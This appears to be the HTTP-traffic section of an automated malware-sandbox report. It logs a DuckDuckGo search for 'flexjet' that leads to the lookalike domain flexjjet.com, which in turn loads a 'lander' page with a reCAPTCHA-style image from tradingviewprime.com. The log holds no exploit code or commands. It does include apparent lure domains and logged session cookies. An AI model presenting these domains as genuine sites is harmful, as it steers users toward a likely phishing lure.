        Source: global trafficHTTP traffic detected: GET /d.js?q=flexjet&t=A&l=us-en&s=0&a=h_&ct=US&vqd=4-253568358988729779796085164939430573451&bing_market=en-US&p_ent=airline&ex=-1&dp=ASj8L4It2rBvbCrznoVAyJ8ydJvoAfCp7heLt-y64QwARiN62U9_IwytII5pKKXlsgwrGWd_fXoKXkBW1LJC5fV1TOLiB7-2_u9O8czbbGw.kqtrVddIXfiAJFWgaadkRw&wpa=Flexjet&perf_id=c88386c9437397ce&parent_perf_id=2604a6ba265a4931&host_region=usc&sp=0&dfrsp=1&baa=1&bcca=1&bpa=1&btaa=1&wrap=1&aps=0&aboutmapsexp=b&bccaexp=b&biaexp=b&btaaexp=b&direxp=b&litexp=c&msvrtexp=b&newsexp=b&shoppingexp=b&you_news_verticalexp=b HTTP/1.1host: links.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /assets/logo_header.v109.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /dist/wpm.3359.0c3e0fbf9f8cff52c9ab.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /dist/wpm.1619.ea48354a2359f567744b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /dist/wpm.9982.d2c6c34ca61e3ca7c452.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /dist/s.97bc44cde1cf9fb5ddcd.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/fe21b530ba74e4553643.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/212874b7047e393bacb8.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/23d563f964108cbb5b74.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /assets/icons/related/loupe-grey.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /assets/icons/favicons/wikipedia.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/96adebdbdbc5d4e75d7f.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/0557b8fc0e7117648c6b.gif HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /iu/?u=https%3A%2F%2Fwww.bing.com%2Fth%3Fid%3DOADD2.7971501094202_1ZTQBC2WZV07776MFH%26pid%3D21.2%26h%3D32&f=1 HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/flexjjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /i/71bff817ed59c3bf.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /y.js?ifu=%7B3%7Dappid%3D055AAD1BA669BEB8B048128DC89A107C678B527B%26rguid%3Dece6ed60509a42b38bb78814f9f00f32&iurl=%7B2%7DIG%3DC0D1F839EA664342A210C610688ECCC8%26CID%3D1AD6F6DB0D996C732D74E0DD0C816D26%26Type%3DEvent.CPT%26DATA%3D0&impr=1m%3A42%3B52%3B56%3B43%250945%255B44%255D%250947%255B46%255D%250949%255B48%255D%250951%255B50%255D%7C5b%3A57%3B79%3B58%250960%255B59%255D%250962%255B61%255D%250964%255B63%255D%250966%255B65%255D&rvf=5&adUnitIndex=8&aba=0 HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/www2.flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /ip3/aeroplane.biz.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/fe21b530ba74e4553643.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/212874b7047e393bacb8.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/23d563f964108cbb5b74.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /assets/icons/related/loupe-grey.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/simpleflying.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /assets/icons/favicons/wikipedia.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /opensearch.xml?atb=v485-6__ HTTP/1.1host: duckduckgo.comsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/96adebdbdbc5d4e75d7f.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /dist/react-assets/0557b8fc0e7117648c6b.gif HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/privatejetcardcomparisons.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /i/71bff817ed59c3bf.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /y.js?ifu=%7B3%7Dappid%3D055AAD1BA669BEB8B048128DC89A107C678B527B%26rguid%3Dece6ed60509a42b38bb78814f9f00f32&iurl=%7B2%7DIG%3DC0D1F839EA664342A210C610688ECCC8%26CID%3D1AD6F6DB0D996C732D74E0DD0C816D26%26Type%3DEvent.CPT%26DATA%3D0&impr=1m%3A42%3B52%3B56%3B43%250945%255B44%255D%250947%255B46%255D%250949%255B48%255D%250951%255B50%255D%7C5b%3A57%3B79%3B58%250960%255B59%255D%250962%255B61%255D%250964%255B63%255D%250966%255B65%255D&rvf=5&adUnitIndex=8&aba=0 HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /iu/?u=https%3A%2F%2Fwww.bing.com%2Fth%3Fid%3DOADD2.7971501094202_1ZTQBC2WZV07776MFH%26pid%3D21.2%26h%3D32&f=1 HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/aeroplane.biz.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/www2.flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
        Source: global trafficHTTP traffic detected: GET /ip3/simpleflying.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/privatejetcardcomparisons.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ip3/flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /lander/flexjet/Flexjet%20_%20Private%20Jet%20Company%20_%20Aircraft%20Ownership%20_%20Leasing_files/video-js.min.css HTTP/1.1host: flexjjet.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://flexjjet.com/?type=3accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6scookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDMsXCIzMzRcIjoxNzQ5NTAyMDY2fSxcImNhbXBhaWduc1wiOntcIjExM1wiOjE3NDk1MDIwNDN9LFwidGltZVwiOjE3NDk1MDIwNDN9In0.-yxM_jtNUdCm4aGDn10UCznT9MukIp53FTP7S7YVnBspriority: u=0
        Source: global trafficHTTP traffic detected: GET /?type=3 HTTP/1.1host: flexjjet.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6ecookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDN9LFwiY2FtcGFpZ25zXCI6e1wiMTEzXCI6MTc0OTUwMjA0M30sXCJ0aW1lXCI6MTc0OTUwMjA0M30ifQ.io15MZ8hAmszvEd6-fhL5GBD-J4okyPU3j_xJ2ROQAEpriority: u=0, i
        Source: global trafficHTTP traffic detected: GET /lander/tradingview/index.html HTTP/1.1host: tradingviewprime.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://flexjjet.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
        Source: global trafficHTTP traffic detected: GET /lander/tradingview/recaptcha-project-browser-transparent.png HTTP/1.1host: tradingviewprime.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://tradingviewprime.com/lander/tradingview/index.htmlaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
        Source: global trafficHTTP traffic detected: GET /releases/v5.0.0/css/all.css HTTP/1.1host: use.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://tradingviewprime.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /releases/v5.0.0/webfonts/fa-brands-400.woff2 HTTP/1.1host: use.fontawesome.comorigin: https://tradingviewprime.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://use.fontawesome.com/releases/v5.0.0/css/all.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4
